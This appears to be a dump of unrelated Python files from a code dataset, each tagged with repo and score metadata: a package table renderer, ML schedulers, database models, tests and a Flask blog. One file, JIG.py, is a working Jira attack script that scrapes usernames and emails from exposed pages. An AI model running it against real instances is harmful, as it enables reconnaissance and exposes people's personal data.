'title': 'Title', 'category': 'Category', 'strength': 'Sub-category', 'votes_for': 'Votes For', 'votes_against': 'Votes Against', 'implementation': 'Date Implemented', 'author': 'Author' }, inplace=True) df.sort_values(by='Number', inplace=True) def join_coauthors(coauthor_list, j=', '): """ Removes empty/whitespace-only strings and then joins """ authors = [s for s in coauthor_list if s.strip() != ''] return j.join(authors) df['Co-authors'] = df[['coauthor0', 'coauthor1', 'coauthor2']] \ .replace({np.nan: ''}) \ .agg(join_coauthors, axis=1) assert all(df['Sub-category'] != '0'), 'resolutions {} have sub-category 0'.format( df.loc[df['Sub-category'] != '0', 'Title'].values ) return df[['Number', 'Title', 'Category', 'Sub-category', 'Author', 'Co-authors', 'Votes For', 'Votes Against', 'Date Implemented']].copy() # take only relevant vars
2.75
3
conans/search/binary_html_table.py
matthiasng/conan
2
11840
import os from collections import OrderedDict, defaultdict from conans.model.ref import PackageReference from conans.util.files import save class RowResult(object): def __init__(self, remote, reference, data): self.remote = remote self.reference = reference self._data = data @property def recipe(self): return self.reference @property def package_id(self): return self._data['id'] @property def outdated(self): return self._data['outdated'] def row(self, headers): """ Returns package data according to headers """ assert isinstance(headers, Headers), "Wrong type: {}".format(type(headers)) for it in headers.keys: try: yield getattr(self, it) except AttributeError: yield self._data[it] for it in headers.settings: yield self._data['settings'].get(it, None) for it in headers.options: yield self._data['options'].get(it, None) if headers.requires: prefs = [PackageReference.loads(it) for it in self._data['requires']] yield ', '.join(map(str, [it.ref for it in prefs])) class Headers(object): _preferred_ordering = ['os', 'arch', 'compiler', 'build_type'] def __init__(self, settings, options, requires, keys): # Keys: columns to classify self.keys = keys self.options = options self.requires = requires # - Order settings _settings = defaultdict(list) for it in settings: try: category, _ = it.split('.', 1) except ValueError: _settings[it].append(it) else: _settings[category].append(it) self.settings = [] for it in self._preferred_ordering: if it in _settings: self.settings.extend(sorted(_settings[it])) for it, values in _settings.items(): if it not in self._preferred_ordering: self.settings.extend(sorted(values)) def row(self, n_rows=2): """ Retrieve list of headers as a single list (1-row) or as a list of tuples with settings organized by categories (2-row). Example output: 1-row: ['os', 'arch', 'compiler', 'compiler.version', 'compiler.libcxx', 'build_type'] 2-row: [('os', ['']), ('arch', ['']), ('compiler', ['', 'version', 'libcxx']),] """ headers = list(self.keys) if n_rows == 1: headers.extend(self.settings + self.options) if self.requires: headers.append('requires') return headers elif n_rows == 2: headers = [(it, ['']) for it in headers] settings = self._group_settings(self.settings) headers.extend(settings) headers.append(('options', self.options)) if self.requires: headers.append(('requires', [''])) return headers else: raise NotImplementedError("not yet") @staticmethod def _group_settings(settings): """ From one row to two-rows using '.' as separator """ ret = OrderedDict() for setting in settings: try: category, value = setting.split(".", 1) except ValueError: ret.setdefault(setting, []).append('') else: ret.setdefault(category, []).append(value) return [(key, values) for key, values in ret.items()] class Results(object): def __init__(self, results): self._results = results # Collect data inspecting the packages _settings = set() _options = set() _remotes = set() self.requires = False for it in results: _remotes.add(it['remote']) for p in it['items'][0]['packages']: _settings = _settings.union(list(p['settings'].keys())) _options = _options.union(list(p['options'].keys())) if len(p['requires']): self.requires = True self.settings = list(_settings) self.options = list(_options) self.remotes = list(_remotes) def get_headers(self, keys=('remote', 'reference', 'outdated', 'package_id')): return Headers(self.settings, self.options, self.requires, keys=keys) def packages(self): for it in self._results: remote = it['remote'] reference = it['items'][0]['recipe']['id'] for p in it['items'][0]['packages']: r = RowResult(remote, reference, p) yield r def html_binary_graph(search_info, reference, table_filename, template): # Adapt data to the template (think twice about the format before documenting) search = {'reference': str(reference)} results = Results(search_info) # Render and save template_folder = os.path.dirname(template.filename) content = template.render(search=search, results=results, base_template_path=template_folder) save(table_filename, content)
2.40625
2
irancovid-19.py
AmiiirCom/irancovid-19
0
11841
<reponame>AmiiirCom/irancovid-19 from covid import Covid import json covid = Covid(source="worldometers") covid.get_data() iran_casses = covid.get_status_by_country_name("iran") confirmed = iran_casses['confirmed'] new_cases = iran_casses['new_cases'] deaths = iran_casses['deaths'] recovered = iran_casses['recovered'] active = iran_casses['active'] critical = iran_casses['critical'] new_deaths = iran_casses ['new_deaths'] total_tests = iran_casses['total_tests'] total_tests_per_million = int(iran_casses['total_tests_per_million']) total_cases_per_million = int(iran_casses['total_cases_per_million']) total_deaths_per_million = int(iran_casses['total_deaths_per_million']) population = int(iran_casses['population']) pr = json.dumps({ 'confirmed': confirmed, 'new_cases': new_cases, 'deaths': deaths, 'recovered': recovered, 'active': active, 'critical': critical, 'new_deaths': new_deaths, 'total_tests': total_tests, 'total_tests_per_million': total_tests_per_million, 'total_cases_per_million': total_cases_per_million, 'total_deaths_per_million': total_deaths_per_million, 'population': population }) print(pr)
2.703125
3
models/__init__.py
esentino/literate-doodle
0
11842
<reponame>esentino/literate-doodle<gh_stars>0 # models/__init__.py from clcrypto import password_hash from psycopg2 import connect def make_connection(db_name='w3'): cnx = connect(user='postgres', password='<PASSWORD>', database=db_name, host='localhost') cnx.autocommit = True return cnx class User: __id = None username = None __hashed_password = None email = None def __init__(self): self.__id = -1 self.username = "" self.email = "" self.__hashed_password = "" @property def id(self): return self.__id @property def hashed_password(self): return self.__hashed_password def set_password(self, password, salt): self.__hashed_password = password_hash(password, salt) def save_to_db(self, cursor): if self.__id == -1: # saving new instance using prepared statements sql = """INSERT INTO Users(username, email, hashed_password) VALUES(%s, %s, %s) RETURNING id""" values = (self.username, self.email, self.hashed_password) cursor.execute(sql, values) self.__id = cursor.fetchone()[0] # albo cursor.fetchone()['id'] return True else: sql = """UPDATE Users SET username=%s, email=%s, hashed_password=%s WHERE id=%s""" values = (self.username, self.email, self.hashed_password, self.id) cursor.execute(sql, values) return True @staticmethod def load_user_by_id(cursor, user_id): sql = "SELECT id, username, email, hashed_password FROM users WHERE id=%s" cursor.execute(sql, (user_id,)) # (user_id, ) - bo tworzymy krotkę data = cursor.fetchone() if data: loaded_user = User() loaded_user.__id = data[0] loaded_user.username = data[1] loaded_user.email = data[2] loaded_user.__hashed_password = data[3] return loaded_user else: return None @staticmethod def find_by_email(cursor, username): sql = "SELECT id, username, email, hashed_password FROM users WHERE email=%s" cursor.execute(sql, (username,)) # (user_id, ) - bo tworzymy krotkę data = cursor.fetchone() if data: loaded_user = User() loaded_user.__id = data[0] loaded_user.username = data[1] loaded_user.email = data[2] loaded_user.__hashed_password = data[3] return loaded_user else: return None @staticmethod def find_all( cursor): sql = "SELECT id, username, email, hashed_password FROM Users" ret = [] cursor.execute(sql) for row in cursor.fetchall(): loaded_user = User() loaded_user.__id = row[0] loaded_user.username = row[1] loaded_user.email = row[2] loaded_user.__hashed_password = row[3] ret.append(loaded_user) return ret def delete(self, cursor): sql = "DELETE FROM Users WHERE id=%s" cursor.execute(sql, (self.__id,)) self.__id = -1 return True
3.078125
3
crys3d/command_line/model_viewer.py
rimmartin/cctbx_project
0
11843
from __future__ import division # LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1 # LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1 import cStringIO from crys3d.wx_selection_editor import selection_editor_mixin import wx import libtbx.load_env import sys, os, time ######################################################################## # CLASSES AND METHODS FOR STANDALONE VIEWER # class App (wx.App) : def __init__ (self, title="crys3d.wx_model_viewer", default_size=(800,600), viewer_class=selection_editor_mixin) : self.title = title self.default_size = default_size self.viewer_class = viewer_class wx.App.__init__(self, 0) def OnInit (self) : self.frame = wx.Frame(None, -1, self.title, pos=wx.DefaultPosition, size=self.default_size) self.frame.CreateStatusBar() box = wx.BoxSizer(wx.VERTICAL) self.view_objects = self.viewer_class(self.frame, size=(800,600)) box.Add(self.view_objects, wx.EXPAND, wx.EXPAND) self.frame.SetSizer(box) box.SetSizeHints(self.frame) return True def run (args, viewer_class=selection_editor_mixin) : import cStringIO pdb_files = [] cif_files = [] show_ss_restraints = False fast_connectivity = True for arg in args : if os.path.isfile(arg) : import iotbx.pdb if iotbx.pdb.is_pdb_file(arg) : pdb_files.append(os.path.abspath(arg)) elif arg.endswith(".cif") : cif_files.append(os.path.abspath(arg)) elif arg == "--ss" : show_ss_restraints = True elif arg in ["--thorough", "--slow", "--use_monomer_library"] : fast_connectivity = False if len(pdb_files) == 0 : print "Please specify a PDB file (and optional CIFs) on the command line." return a = App(viewer_class=viewer_class) a.frame.Show() out = sys.stdout if not "--debug" in args : out = cStringIO.StringIO() for file_name in pdb_files : print "Reading PDB file %s" % file_name from iotbx import file_reader from mmtbx.monomer_library import pdb_interpretation from mmtbx import secondary_structure t1 = time.time() if fast_connectivity : pdb_in = file_reader.any_file(file_name, force_type="pdb") pdb_hierarchy = pdb_in.file_object.hierarchy atomic_bonds = pdb_hierarchy.distance_based_simple_two_way_bond_sets() acp_selection = None else : processed_pdb_file = pdb_interpretation.run(args=[file_name]+cif_files, log=out) pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy pdb_hierarchy.atoms().reset_i_seq() grm = processed_pdb_file.geometry_restraints_manager() acp_selection = processed_pdb_file.all_chain_proxies.selection if grm is None or grm.shell_sym_tables is None : raise Sorry("Atomic bonds could not be calculated for this model. "+ "This is probably due to a missing CRYST1 record in the PDB file.") atomic_bonds = grm.shell_sym_tables[0].full_simple_connectivity() t2 = time.time() print "%.2fs" % (t2-t1) a.view_objects.add_model(file_name, pdb_hierarchy, atomic_bonds, mmtbx_selection_function=acp_selection) sec_str = secondary_structure.manager( pdb_hierarchy=pdb_hierarchy, xray_structure=None) a.view_objects.set_sec_str(file_name, sec_str.selections_as_ints()) if show_ss_restraints and acp_selection is not None : bonds_table = secondary_structure.process_structure(params=None, processed_pdb_file=processed_pdb_file, tmp_dir=os.getcwd(), log=sys.stderr) a.view_objects.set_noncovalent_bonds(file_name, bonds_table.bonds) a.view_objects.flag_show_noncovalent_bonds = True a.view_objects.set_model_base_color([1.0,1.0,1.0], file_name) a.view_objects.set_color_mode("element") a.view_objects.force_update(recenter=True) a.MainLoop() if __name__ == "__main__" : if "--test" in sys.argv : pdb_file = libtbx.env.find_in_repositories( relative_path="phenix_regression/pdb/1ywf.pdb", test=os.path.isfile) run([pdb_file, "--ss"]) else : run(sys.argv[1:])
1.78125
2
Crypto/py3compat.py
eddiejessup/transcrypt
14
11844
<reponame>eddiejessup/transcrypt __revision__ = "$Id$" def b(s): return s.encode("latin-1") def bchr(s): return bytes([s]) def bstr(s): if isinstance(s, str): return bytes(s, "latin-1") else: return bytes(s) def bord(s): return s def tobytes(s): if isinstance(s, bytes): return s else: if isinstance(s, str): return s.encode("latin-1") else: return bytes(s) def tostr(bs): return bs.decode("latin-1") from io import BytesIO
2.484375
2
verres/optim/schedule.py
csxeba/Verres
0
11845
from typing import Dict import numpy as np import tensorflow as tf import verres as V class ConstantSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, learning_rate: float): super().__init__() self.learning_rate = float(learning_rate) def __call__(self, step): return self.learning_rate def get_config(self): return dict(learning_rate=self.learning_rate) class LinearLRSchedule(tf.keras.callbacks.Callback): def __init__(self, cycle_length: int, steps_per_epoch: int, lr_map: Dict[int, float], initial_lr: float = None): super().__init__() self.schedule = None self.pointer = 0 self.cycle_length = None self.make_schedule(cycle_length, steps_per_epoch, lr_map, initial_lr) def make_schedule(self, cycle_length: int, steps_per_epoch: int, lr_map: Dict[int, float], initial_lr: float = None): self.cycle_length = cycle_length schedule = np.empty(self.cycle_length * steps_per_epoch, dtype="float32") if 0 not in lr_map: if initial_lr is None: raise RuntimeError("Either pass the initial learning rate in the lr_map or as a dedicated parameter!") else: lr_map = lr_map.copy() initial_lr = lr_map.pop(0) start_step = 0 current_lr = initial_lr for end_epoch, next_lr in sorted(lr_map.items(), key=lambda it: it[0]): steps = end_epoch * steps_per_epoch - start_step schedule[start_step:start_step+steps] = np.linspace( current_lr, next_lr, num=steps, endpoint=False, dtype="float32") start_step += steps current_lr = next_lr schedule[start_step:] = current_lr self.schedule = schedule def on_batch_end(self, batch, logs=None): self.model.optimizer.lr = self.schedule[self.pointer] self.pointer += 1 self.pointer %= self.cycle_length def on_epoch_end(self, epoch, logs=None): logs["lr"] = self.schedule[self.pointer] def factory(spec: dict) -> tf.optimizers.schedules.LearningRateSchedule: name = spec.pop("name", "default") if name.lower() in {"default", "constant"}: scheduler = ConstantSchedule(float(spec["learning_rate"])) else: scheduler_type = getattr(tf.optimizers.schedules, name, None) if scheduler_type is None: raise KeyError(f"No such scheduler: {name}") scheduler = scheduler_type(**spec) print(f" [Verres.schedule] - Factory built: {name}") return scheduler
2.5625
3
JIG.py
mmg1/JIG
28
11846
<reponame>mmg1/JIG import re import sys from itertools import izip as zip import argparse import requests # argparse definitions parser = argparse.ArgumentParser(description='Jira attack script') parser.add_argument('URL', type=str , help='the URL of the Jira instance... ex. https://jira.organization.com/') parser.add_argument('-u' ,'--usernames', dest='names', action='store_const', const=True, help='Print discovered usernames') parser.add_argument('-e' , '--emails', dest='emails',action='store_const', const=True, help='Print discovered email addresses') parser.add_argument('-a' ,'--all', dest='all',action='store_const',const=True,help='Print discovered email addresses and usernames') parser.add_argument('-eu' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS) parser.add_argument('-ue' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS) args = parser.parse_args() url = args.URL if args.URL[-1] != '/': args.URL = args.URL + "/" # Define URLs pickerURL = args.URL + "secure/popups/UserPickerBrowser.jspa?max=9999" filtersURL = args.URL + "secure/ManageFilters.jspa?filter=popular" #dashboardURL = args.URL + "secure/Dashboard.jspa" def extractPicker(response): ''' Takes in the response body for UserBrowserPicker and returns a dictionary containing usernames and email addresses. ''' userList = re.compile(r"-name\">(.*)</td>").findall(response.text) emailList = re.compile(r">(.*\@.*)</td>").findall(response.text) dictionary = dict(zip(userList , emailList)) return dictionary def extractFilters(response): ''' Takes in the response body for the manage filters page and returns a list containing usernames. ''' userList = re.compile(r"</span>.\((.*)\)").findall(response.text) return list(set(userList)) def validateURL(url): ''' Runs a stream of validation on a given URL and returns the response and a boolean value. ''' try: s = requests.Session() validateresponse = s.get(url , allow_redirects=False,timeout=5) except requests.exceptions.InvalidSchema: print "" print "[-] Invalid schema provided... Must follow format https://jira.organization.com/" print "" sys.exit(1) except requests.exceptions.MissingSchema: print "" print "[-] A supported schema was not provided. Please use http:// or https://" print "" sys.exit(1) except requests.exceptions.InvalidURL: print "[-] Invalid base URL was supplied... Please try again." sys.exit(1) except requests.exceptions.ConnectionError: print "" print "[-] Connection failed... Please check the URL and try again." print "" sys.exit(1) except requests.exceptions.RequestException: print "" print "[-] An unknown exception occurred... Please try again." print "" sys.exit(1) if validateresponse.status_code == 200: return validateresponse,True else: return "[-] The page is inaccessible",False if __name__ == "__main__": pickerResponse,pickerAccessible = validateURL(pickerURL) filterResponse,filterAccessible = validateURL(filtersURL) print "" print "" print "[+] Checking the User Picker page..." if pickerAccessible == True: users = extractPicker(pickerResponse) print "" print "[+] Success..." print "[+] Users: "+str(len(users)) print "[+] Emails: " + str(len(users)) print "" if (args.emails and args.names) or args.all: print '{:<20}{:<20}'.format("---Username---", "---------Email---------") for username, email in sorted(users.iteritems()): print '{:<20}{:<20}'.format(username,email) elif args.emails: for username,email in sorted(users.iteritems()): print email elif args.names: for username,email in sorted(users.iteritems()): print username print "" elif pickerAccessible == False: print pickerResponse print "" print "" print "[+] Checking the Manage Filters page..." if filterAccessible == True: filterUsers = extractFilters(filterResponse) if args.names or args.all: if len(filterUsers) == 0: print "[-] We could not find any anonymously accessible filters" print "" else: print "[+] The Manage Filters page is accessible and contains data..." print "" for username in filterUsers: print username print "" elif filterAccessible == False: print filterResponse
3
3
run.py
SamChatfield/final-year-project
0
11847
import json import string from datetime import datetime import deap import numpy as np import hmm from discriminator import Discriminator from ea import EA import random_search DEFAULT_PARAMS = { # Discriminator CNN model "model": "CNNModel3", # Algorithm Parameters "states": 5, "symbols": 5, "epochs": 10, "epoch_size": 500, "batch_size": 200, "seq_len": 20, "pop_size": 25, "gens": 50, "offspring_prop": 1.0, "cx_prob": 0.0, "mut_fn": "uniform", "mut_prob": 1.0, "mut_rate": None, # None - default to 1/N where N is number of genes # Implementation Parameters "_pool_size": 4, "_random_search": True, # Also run an elitist random search over #gens to compare performance } def param_assert(params): assert params["states"] > 0 assert 0 < params["symbols"] <= 26 assert 0.0 <= params["offspring_prop"] <= 1.0 assert 0.0 <= params["cx_prob"] <= 1.0 assert 0.0 <= params["mut_prob"] <= 1.0 assert (params["mut_rate"] is None) or (0.0 <= params["mut_rate"] <= 1.0) def run(param_subset): # Overwrite the default values of the provided parameters params = {**DEFAULT_PARAMS, **param_subset} print(params) param_assert(params) x = params["states"] y = string.ascii_lowercase[: params["symbols"]] s = [1.0] + [0.0] * (x - 1) # Random HMM that will act as the 'true' underlying distribution real_hmm = hmm.random_hmm(x, y, s) # Different random HMM that will be used to benchmark the best solution we find rand_hmm = hmm.random_hmm(x, y, s) d = Discriminator( real_hmm, params["epoch_size"], params["batch_size"], params["seq_len"], model=params["model"], pool_size=params["_pool_size"], ) print("Pre-training discriminator...") accs, losses = d.initial_train(params["epochs"]) acc = accs[-1] loss = losses[-1] print(f"Pre-trained discriminiator accuracy: {acc}, loss: {loss}") g = EA( discriminator=d, pop_size=params["pop_size"], states=x, symbols=len(y), offpr=params["offspring_prop"], cxpb=params["cx_prob"], mut_fn=params["mut_fn"], mutpb=params["mut_prob"], mut_rate=params["mut_rate"], ) print("Running generator...") final_pop, _, logbook = g.run(params["gens"]) best_ind = deap.tools.selBest(final_pop, 1)[0] best_hmm = hmm.HMM(x, np.array(list(y)), best_ind[0], best_ind[1], np.array(s)) if params["_random_search"]: print("Running random search benchmark...") rs_best_hmm, rs_best_acc = random_search.run( d, params["states"], params["symbols"], params["gens"] ) else: rs_best_hmm, rs_best_acc = None, None return real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook def experiment(params, runs): all_params = {**DEFAULT_PARAMS, **params} do_rand_search = all_params["_random_search"] mean_fitnesses = [] best_l2s = [] rand_l2s = [] if do_rand_search: rs_l2s = [] for i in range(runs): print(f"Run {i+1}") real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook = run(params) best_l2 = hmm.total_l2_diff(real_hmm, best_hmm) rand_l2 = hmm.total_l2_diff(real_hmm, rand_hmm) if do_rand_search: rs_l2 = hmm.total_l2_diff(real_hmm, rs_best_hmm) mean_fitnesses.append(logbook.select("mean")) best_l2s.append(best_l2) rand_l2s.append(rand_l2) extra_msg = "" if do_rand_search: rs_l2s.append(rs_l2) extra_msg = f", RandSearch L2: {rs_l2}" print(f"Best L2: {best_l2}, Rand L2: {rand_l2}{extra_msg}") exp_data = { "params": all_params, "mean_fitnesses": mean_fitnesses, "best_l2s": best_l2s, "rand_l2s": rand_l2s, } if do_rand_search: exp_data["rs_l2s"] = rs_l2s exp_file = f'experiments/exp_{datetime.now().strftime("%y%m%d-%H%M%S%f")}.json' with open(exp_file, "w") as f: json.dump(exp_data, f, indent=4) return exp_data def main(): real_hmm, best_hmm, best_l2 = run(DEFAULT_PARAMS) print( f""" Real HMM: {real_hmm} Best HMM: {best_hmm} Best L2: {best_l2} """ ) if __name__ == "__main__": main()
2.53125
3
rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py
wq13552463699/TriFinger_Research
12
11848
#!/usr/bin/env python3 ''' This code traverses a directories of evaluation log files and record evaluation scores as well as plotting the results. ''' import os import argparse import json import copy from shutil import copyfile import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from utils import * MAX_ALIGN_STEPS = 75000 - 1 # This depends on the evaluation code used to generate the logs def generate_csv(log_dir, csv_file): ''' Traverse and read log files, and then output csv file from the eval data. - file to be generated: 'eval_scores.csv' - columns: state_machine_id, timesteps, rot_error ''' df = pd.DataFrame(columns=['state_machine_id', 'state_machine_name', 'timesteps', 'rot_error']) model_names = extract_model_names(log_dir) # Traverse all episodes and add each entry to data frame for state_machine_id, episode_idx, episode_dir in traverse_all_episodes(log_dir): json_util = JsonUtil(os.path.join(episode_dir, 'goal.json')) entry = { 'state_machine_id': state_machine_id, 'state_machine_name': model_names[state_machine_id], **json_util.load() } # Handling the timesteps==-1 case if entry['reachfinish'] == -1: entry['reachfinish'] = MAX_ALIGN_STEPS if entry['reachstart'] == -1: raise ValueError('\'reachstart\' in {episode_dir}/goal.json does not contain a valid value.') # Rename dict keys entry['timesteps'] = entry.pop('reachfinish') - entry.pop('reachstart') entry['rot_error'] = entry.pop('align_obj_error') entry['init_rot_error'] = entry.pop('init_align_obj_error', None) # Add a new entry entry['rot_error_diff'] = entry['init_rot_error'] - entry['rot_error'] df = df.append(entry, ignore_index=True) # df.append works differently from python since it is stupid df.to_csv(csv_file, index=False) def generate_plot(input_csv_file, plot_file): data = pd.read_csv(input_csv_file) sns.scatterplot(data=data, x="timesteps", y="rot_error", hue="state_machine_name", alpha=0.8) plt.savefig(plot_file)
2.640625
3
test cases/common/64 custom header generator/makeheader.py
objectx/meson
0
11849
#!/usr/bin/env python3 # NOTE: this file does not have the executable bit set. This tests that # Meson can automatically parse shebang lines. import sys template = '#define RET_VAL %s\n' output = template % (open(sys.argv[1]).readline().strip()) open(sys.argv[2], 'w').write(output)
2.0625
2
studio_ghibli/movies/test_data.py
hbansal0122/studio_ghibli_project
0
11850
<filename>studio_ghibli/movies/test_data.py """ Test data""" stub_films = [{ "id": "12345", "title": "This is film one", },{ "id": "23456", "title": "This is film two", }] stub_poeple = [{ "name": "<NAME>", "films": ["url/12345", "url/23456"] },{ "name": "<NAME>", "films": ["url/23456"] },{ "name": "<NAME>", "films": ["url/12345"] },{ "name": "person 4", "films": ["url/12345"] }]
1.601563
2
data_converters/fsdbripper/create_new_db.py
osvaldolove/amiberry-api
0
11851
<reponame>osvaldolove/amiberry-api<gh_stars>0 import sqlite3 from constants import DESTINATION_DB destination_connection = sqlite3.connect(DESTINATION_DB) destination_cursor = destination_connection.cursor() destination_cursor.execute('CREATE TABLE game(uuid, payload)')
1.75
2
upvote/gae/shared/common/json_utils_test.py
cclauss/upvote
0
11852
<reponame>cclauss/upvote<filename>upvote/gae/shared/common/json_utils_test.py # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for json_utils.""" import datetime import json from google.appengine.ext import ndb from common.testing import basetest from upvote.gae.datastore.models import santa from upvote.gae.shared.common import json_utils from upvote.shared import constants class TestModel(ndb.Model): datetime_prop = ndb.DateTimeProperty() int_prop = ndb.IntegerProperty() string_prop = ndb.StringProperty() class BaseEncoderTest(basetest.AppEngineTestCase): def setUp(self): super(BaseEncoderTest, self).setUp() self.test_model = TestModel( datetime_prop=datetime.datetime(2015, 6, 3, 12, 30, 0), int_prop=111, string_prop='STRING!') self.test_key = self.test_model.put() self.blockable_key = ndb.Key( santa.SantaBlockable, '<KEY>') self.santa_event = santa.SantaEvent( id='2324342', blockable_key=self.blockable_key, event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN, executing_user='user1', file_name='Product.app', file_path='/Applications/Product.app/Contents/MacOs', host_id='AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', last_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0), first_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0)) def _PerformEncoding(self, to_encode): encoded = self.json_encoder.encode(to_encode) return json.loads(encoded) def _VerifyEncoding(self, expected, actual): if isinstance(expected, list): self.assertTrue(isinstance(actual, list)) self.assertEqual(len(expected), len(actual)) for i, j in zip(sorted(expected), sorted(actual)): self._VerifyEncoding(i, j) elif isinstance(expected, dict): self.assertTrue(isinstance(actual, dict)) # assertDictEqual would be more concise, but this keeps us from having to # update the expected dict every time there's a model change, e.g. # SantaEvent. for key, value in expected.iteritems(): self.assertIn(key, actual) self.assertEqual(value, actual[key]) else: self.assertEqual(expected, actual) class JSONEncoderTest(BaseEncoderTest): def setUp(self): super(JSONEncoderTest, self).setUp() self.json_encoder = json_utils.JSONEncoder() def testEncode_Set(self): actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Frozenset(self): actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Datetime(self): actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0)) self._VerifyEncoding('2015-04-01T17:00Z', actual) def testEncode_Date(self): actual = self._PerformEncoding(datetime.date(2014, 2, 3)) self._VerifyEncoding('2014-02-03', actual) def testEncode_Time(self): actual = self._PerformEncoding(datetime.time(10, 20, 30)) self._VerifyEncoding('10:20:30', actual) def testEncode_Key(self): expected = self.test_key.urlsafe() actual = self._PerformEncoding(self.test_key) self._VerifyEncoding(expected, actual) def testEncode_Model(self): expected = { 'datetime_prop': '2015-06-03T12:30Z', 'int_prop': 111, 'string_prop': 'STRING!'} actual = self._PerformEncoding(self.test_model) self._VerifyEncoding(expected, actual) def testEncode_SantaEvent(self): # Test the encoding of a single SantaEvent. expected = { 'blockable_key': self.blockable_key.urlsafe(), 'class_': ['Event', 'SantaEvent'], 'event_type': constants.EVENT_TYPE.ALLOW_UNKNOWN, 'executing_user': 'user1', 'file_name': 'Product.app', 'file_path': '/Applications/Product.app/Contents/MacOs', 'host_id': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', 'id': '2324342', 'last_blocked_dt': '2015-04-01T17:00Z', 'first_blocked_dt': '2015-04-01T17:00Z', } actual = self._PerformEncoding(self.santa_event) self._VerifyEncoding(expected, actual) # Test the encoding of a SantaEvent list. actual = self._PerformEncoding([self.santa_event]) self._VerifyEncoding([expected], actual) def testEncodeBoolean(self): """Test encoding a single Boolean value.""" actual = self._PerformEncoding(True) self._VerifyEncoding(True, actual) class JSONEncoderJavascriptTest(BaseEncoderTest): def setUp(self): super(JSONEncoderJavascriptTest, self).setUp() self.json_encoder = json_utils.JSONEncoderJavaScript() def testEncode_Set(self): actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Frozenset(self): actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Datetime(self): actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0)) self._VerifyEncoding('2015-04-01T17:00Z', actual) def testEncode_Date(self): actual = self._PerformEncoding(datetime.date(2014, 2, 3)) self._VerifyEncoding('2014-02-03', actual) def testEncode_Time(self): actual = self._PerformEncoding(datetime.time(10, 20, 30)) self._VerifyEncoding('10:20:30', actual) def testEncode_Key(self): expected = self.test_key.urlsafe() actual = self._PerformEncoding(self.test_key) self._VerifyEncoding(expected, actual) def testEncode_Model(self): expected = { 'datetimeProp': '2015-06-03T12:30Z', 'intProp': 111, 'stringProp': 'STRING!'} actual = self._PerformEncoding(self.test_model) self._VerifyEncoding(expected, actual) def testEncode_SantaEvent(self): # Test the encoding of a single SantaEvent. expected = { 'blockableKey': self.blockable_key.urlsafe(), 'class_': ['Event', 'SantaEvent'], 'eventType': constants.EVENT_TYPE.ALLOW_UNKNOWN, 'executingUser': 'user1', 'fileName': 'Product.app', 'filePath': '/Applications/Product.app/Contents/MacOs', 'hostId': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', 'id': '2324342', 'lastBlockedDt': '2015-04-01T17:00Z', 'firstBlockedDt': '2015-04-01T17:00Z', } actual = self._PerformEncoding(self.santa_event) self._VerifyEncoding(expected, actual) # Test the encoding of a SantaEvent list. actual = self._PerformEncoding([self.santa_event]) self._VerifyEncoding([expected], actual) def testEncodeBoolean(self): """Test encoding a single Boolean value.""" actual = self._PerformEncoding(True) self._VerifyEncoding(True, actual) if __name__ == '__main__': basetest.main()
2.015625
2
app.py
YukiNagat0/Blog
1
11853
from os import path from typing import Union from datetime import datetime from flask import Flask, request, redirect, render_template from flask_wtf import CSRFProtect from werkzeug.utils import secure_filename from data import db_session from data.posts import Posts from forms.edit_post_form import EditPostForm app = Flask(__name__) app.config['SECRET_KEY'] = 'SECRET_KEY' csrf_protect = CSRFProtect(app) UPLOAD_FOLDER = 'static/posts_img/' app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER DATA_BASE = 'db/blog.sqlite' app.config['DATA_BASE'] = DATA_BASE def edit_post_in_data_base(form: EditPostForm, post: Union[Posts, None]): db_sess = db_session.create_session() post_title = form.title.data post_text = form.text.data post_author = form.author.data post_image = form.image.data # --- Фотография --- if not post_image: post_image_name = '' # Картинки нет else: current_id = db_sess.query(Posts).order_by(Posts.id.desc()).first() current_id = current_id.id + 1 if current_id else 1 real_image_name = secure_filename(post_image.filename) post_image_name = f'{current_id}{real_image_name[real_image_name.rfind("."):]}' post_image.save(path.join(app.config['UPLOAD_FOLDER'], post_image_name)) # --- Фотография --- if not post: # Добавление поста post = Posts() post.title = post_title post.image_name = post_image_name post.text = post_text post.author = post_author post.date = datetime.now() db_sess.add(post) else: # редактирование post.title = post_title post.image_name = post_image_name post.text = post_text post.author = post_author post.date = datetime.now() db_sess.merge(post) db_sess.commit() db_sess.close() return redirect('/') @app.route('/') def index(): params = {'title': 'Blog', 'UPLOAD_FOLDER': app.config['UPLOAD_FOLDER']} db_sess = db_session.create_session() 